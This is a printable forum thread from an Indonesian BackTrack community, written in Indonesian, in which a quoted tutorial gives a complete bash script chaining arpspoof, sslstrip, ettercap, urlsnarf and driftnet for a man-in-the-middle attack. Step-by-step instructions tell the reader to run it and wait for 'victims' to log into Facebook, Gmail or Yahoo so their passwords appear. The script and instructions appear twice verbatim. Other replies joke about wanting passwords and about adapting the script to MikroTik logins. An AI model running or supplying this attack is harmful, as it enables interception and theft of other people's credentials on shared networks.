Indonesian Back|Track Team
Share Sniffing password FB dkk dengen script - Printable Version

+- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum)
+-- Forum: Penetration Testing Os (https://www.indonesianbacktrack.or.id/forum/forum-170.html)
+--- Forum: Backtrack (https://www.indonesianbacktrack.or.id/forum/forum-171.html)
+---- Forum: BackTrack 4 (https://www.indonesianbacktrack.or.id/forum/forum-77.html)
+----- Forum: BackTrack 4 tutorial (https://www.indonesianbacktrack.or.id/forum/forum-78.html)
+----- Thread: Share Sniffing password FB dkk dengen script (/thread-310.html)

Pages: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32


RE: Sniffing password FB dkk dengen script - ekawithoutyou - 03-22-2012

(03-22-2012, 02:30 PM)arif nugeraha Wrote: kepingin!!!!!

kepingin apa om Tongue


RE: Sniffing password FB dkk dengen script - Junior Riau - 03-22-2012

kepingin password n username wkwkwk




RE: Sniffing password FB dkk dengen script - ekawithoutyou - 03-22-2012

(03-22-2012, 06:09 PM)junior.riau18 Wrote: kepingin password n username wkwkwk

jiah wkwkwkwkwk Tongue


RE: Sniffing password FB dkk dengen script - Junior Riau - 03-22-2012

iya,,wkkw,,aduuhh riset ane lum kelar kelar buat ngembangin ni script untuk jalan 100% pada mikrotik dengan login nya via browser -___-"

susah banget,,

kalo pakek ini script standar pasti dapatnya poto doang sama username n password buat login ke mikrotiknya wkwkkww


RE: Sniffing password FB dkk dengen script - ekawithoutyou - 03-22-2012

(03-22-2012, 06:17 PM)junior.riau18 Wrote: iya,,wkkw,,aduuhh riset ane lum kelar kelar buat ngembangin ni script untuk jalan 100% pada mikrotik dengan login nya via browser -___-"

susah banget,,

kalo pakek ini script standar pasti dapatnya poto doang sama username n password buat login ke mikrotiknya wkwkkww

jangan nyerah om terus kembangin Tongue nanti kalo dah 100persen working share yak om


RE: Sniffing password FB dkk dengen script - Junior Riau - 03-22-2012

iyaa itu juga pesan om ikonspirasi,,ntar kalo fix buat thread baru aja jadinya Smile


RE: Sniffing password FB dkk dengen script - ekawithoutyou - 03-22-2012

(03-22-2012, 06:47 PM)junior.riau18 Wrote: iyaa itu juga pesan om ikonspirasi,,ntar kalo fix buat thread baru aja jadinya Smile

sip sip Tongue


RE: Sniffing password FB dkk dengen script - jaw1r - 03-23-2012

(07-05-2011, 10:01 AM)gtx150 Wrote: Hallo rekan2 IBT, mumpung belum ada kerjaan alias masih nganggur dan daripada otak nganggur juga mendingan ane buat tutor sniffing menggunakan script tetapi tutor ini hanya berlaku di BT4 R2 cause sudah dicoba di BT5 ettercapnya bermasalah......

Oke langsung aja bro............

1.Pertama-tama kita copas script dibawah dan buat menjadi executable

Spoiler! :

#!/bin/bash

# Script for sniffing https connections.
# Script use Arpspoof, SSLStrip, Ettercap, Urlsnarf and Driftnet.
# Tested on BT4 R2
# BY gHero,cseven,spudgunman.
# Ver 0.2

# ASCII sniff.sh
echo '
.__ _____ _____ .__
______ ____ |__|/ ____\/ ____\ _____| |__
/ ___// \| \ __\\ __\ / ___/ | \
\___ \| | \ || | | | \___ \| Y \
/____ >___| /__||__| |__| /\/____ >___| /
\/ \/ \/ \/ \/
'

echo '1' > /proc/sys/net/ipv4/ip_forward

iptables --flush
sleep 1

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000


# Arpspoof
echo -n -e "Would you like to ARP a (T)arget or full (N)etwork? ";
read ARPOP

if [ "$ARPOP" == "T" ] ; then
echo
echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
echo '------------------------'
echo -n -e '\E[37;41m'"Client IP address: "; tput sgr0
read IP1
echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
read IP2

echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
read INT
xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' -t '$IP1' '$IP2'' &

else

echo
echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
echo '------------------------'
echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
read IP2

echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
read INT
xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' '$IP2'' &

fi

# SSLSTRIP
xterm -fg green4 -bg grey0 -e 'sslstrip -a -w ssl_log.txt' &

# ETTERCAP
xterm -fg green4 -bg grey0 -e 'ettercap -T -q -i '$INT'' &

# URLSNARF
xterm -fg green4 -bg grey0 -e 'urlsnarf -i '$INT' | grep http > urlsnarf_log.txt' &

# DRIFTNET
driftnet -p -i $INT &


script diatas bukan ane yang buat bro, ane dapat dr forum backtrack.org

2. kalo udah dicopas save as dengan nama bebas terserah agan, kalo ane sih kasih nama file nya "sniff" dan pastikan buat menjadi executeble

3. selanjutnya execute script tadi dengan command
# ./sniff.sh

4. kalo berhasil akan keluar pertanyaan seperti dibawah ini:
Spoiler! :
[Image: snapshot23.png]


5. Tunggu dengan sabar karena kita ga tahu kapan korban akan login ke account FB, Gmail, yahoo dkk. setelah menunggu dengan sabar akhirnya datang eh salah nongol juga tuh password di ettercap
Spoiler! :
[Image: snapshot621.png]


mudah kan cara sniffingnya, tapi inget bro jg diacak acak tuh account orang kan dosa.........

apabila masih ada kekurangan mohon dimaafkan segera karena tujuan ane hanya berbagi.......


CoolCoolCoolCoolCoolCool


asswb...oya bro mau tannya emang ettercap di bt 5 bermasalah apanya?



RE: Sniffing password FB dkk dengen script - ekawithoutyou - 03-23-2012

(03-23-2012, 06:49 AM)jaw1r Wrote:
(07-05-2011, 10:01 AM)gtx150 Wrote: Hallo rekan2 IBT, mumpung belum ada kerjaan alias masih nganggur dan daripada otak nganggur juga mendingan ane buat tutor sniffing menggunakan script tetapi tutor ini hanya berlaku di BT4 R2 cause sudah dicoba di BT5 ettercapnya bermasalah......

Oke langsung aja bro............

1.Pertama-tama kita copas script dibawah dan buat menjadi executable

Spoiler! :

#!/bin/bash

# Script for sniffing https connections.
# Script use Arpspoof, SSLStrip, Ettercap, Urlsnarf and Driftnet.
# Tested on BT4 R2
# BY gHero,cseven,spudgunman.
# Ver 0.2

# ASCII sniff.sh
echo '
.__ _____ _____ .__
______ ____ |__|/ ____\/ ____\ _____| |__
/ ___// \| \ __\\ __\ / ___/ | \
\___ \| | \ || | | | \___ \| Y \
/____ >___| /__||__| |__| /\/____ >___| /
\/ \/ \/ \/ \/
'

echo '1' > /proc/sys/net/ipv4/ip_forward

iptables --flush
sleep 1

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000


# Arpspoof
echo -n -e "Would you like to ARP a (T)arget or full (N)etwork? ";
read ARPOP

if [ "$ARPOP" == "T" ] ; then
echo
echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
echo '------------------------'
echo -n -e '\E[37;41m'"Client IP address: "; tput sgr0
read IP1
echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
read IP2

echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
read INT
xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' -t '$IP1' '$IP2'' &

else

echo
echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
echo '------------------------'
echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
read IP2

echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
read INT
xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' '$IP2'' &

fi

# SSLSTRIP
xterm -fg green4 -bg grey0 -e 'sslstrip -a -w ssl_log.txt' &

# ETTERCAP
xterm -fg green4 -bg grey0 -e 'ettercap -T -q -i '$INT'' &

# URLSNARF
xterm -fg green4 -bg grey0 -e 'urlsnarf -i '$INT' | grep http > urlsnarf_log.txt' &

# DRIFTNET
driftnet -p -i $INT &


script diatas bukan ane yang buat bro, ane dapat dr forum backtrack.org

2. kalo udah dicopas save as dengan nama bebas terserah agan, kalo ane sih kasih nama file nya "sniff" dan pastikan buat menjadi executeble

3. selanjutnya execute script tadi dengan command
# ./sniff.sh

4. kalo berhasil akan keluar pertanyaan seperti dibawah ini:
Spoiler! :
[Image: snapshot23.png]


5. Tunggu dengan sabar karena kita ga tahu kapan korban akan login ke account FB, Gmail, yahoo dkk. setelah menunggu dengan sabar akhirnya datang eh salah nongol juga tuh password di ettercap
Spoiler! :
[Image: snapshot621.png]


mudah kan cara sniffingnya, tapi inget bro jg diacak acak tuh account orang kan dosa.........

apabila masih ada kekurangan mohon dimaafkan segera karena tujuan ane hanya berbagi.......


CoolCoolCoolCoolCoolCool


asswb...oya bro mau tannya emang ettercap di bt 5 bermasalah apanya?

menurut ane ettercap bawaan BT 5 masih blm stable Tongue



RE: Sniffing password FB dkk dengen script - akayama - 03-24-2012

Buat kawan2 yg tau gw mau nanya nich... Sniffer lain yg ada di backtrack 5 R2, selain ettercap dan wireshark... N Cara menggunakannya... ??